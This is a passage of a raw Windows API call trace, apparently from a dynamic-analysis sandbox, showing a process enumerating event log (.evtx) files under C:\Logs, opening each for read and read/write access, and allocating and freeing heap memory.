RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.311] AreFileApisANSI () returned 1 [0072.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x465f8 [0072.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x465f8, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 49 [0072.312] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.312] GetFileType (hFile=0x428) returned 0x1 [0072.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0072.312] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.313] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.313] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.313] CloseHandle (hObject=0x428) returned 1 [0072.313] AreFileApisANSI () returned 1 [0072.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0072.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46358 [0072.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 49 [0072.313] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.313] GetFileType (hFile=0x428) returned 0x1 [0072.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0072.313] CloseHandle (hObject=0x428) returned 1 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.314] AreFileApisANSI () returned 1 [0072.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46a58 [0072.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 49 [0072.314] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0072.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.314] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx", cAlternateFileName="MIB2AC~1.EVT")) returned 1 [0072.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.315] AreFileApisANSI () returned 1 [0072.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx", lpUsedDefaultChar=0x0) returned 41 [0072.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0072.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0072.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.316] AreFileApisANSI () returned 1 [0072.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0072.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0072.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 41 [0072.316] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.316] GetFileType (hFile=0x428) returned 0x1 [0072.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0072.316] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.316] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.317] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.317] CloseHandle (hObject=0x428) returned 1 [0072.317] AreFileApisANSI () returned 1 [0072.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0072.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0072.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 41 [0072.317] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.317] GetFileType (hFile=0x428) returned 0x1 [0072.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0072.317] CloseHandle (hObject=0x428) returned 1 [0072.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0072.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0072.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0072.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0072.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0072.318] AreFileApisANSI () returned 1 [0072.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0072.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 41 [0072.318] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0072.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.318] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cAlternateFileName="MI6AFE~1.EVT")) returned 1 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0072.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0072.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0072.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0072.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.319] AreFileApisANSI () returned 1 [0072.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpUsedDefaultChar=0x0) returned 83 [0072.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0072.320] AreFileApisANSI () returned 1 [0072.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0072.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0072.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=83 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 83 [0072.320] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.321] GetFileType (hFile=0x428) returned 0x1 [0072.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0072.321] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.321] SetFilePointerEx 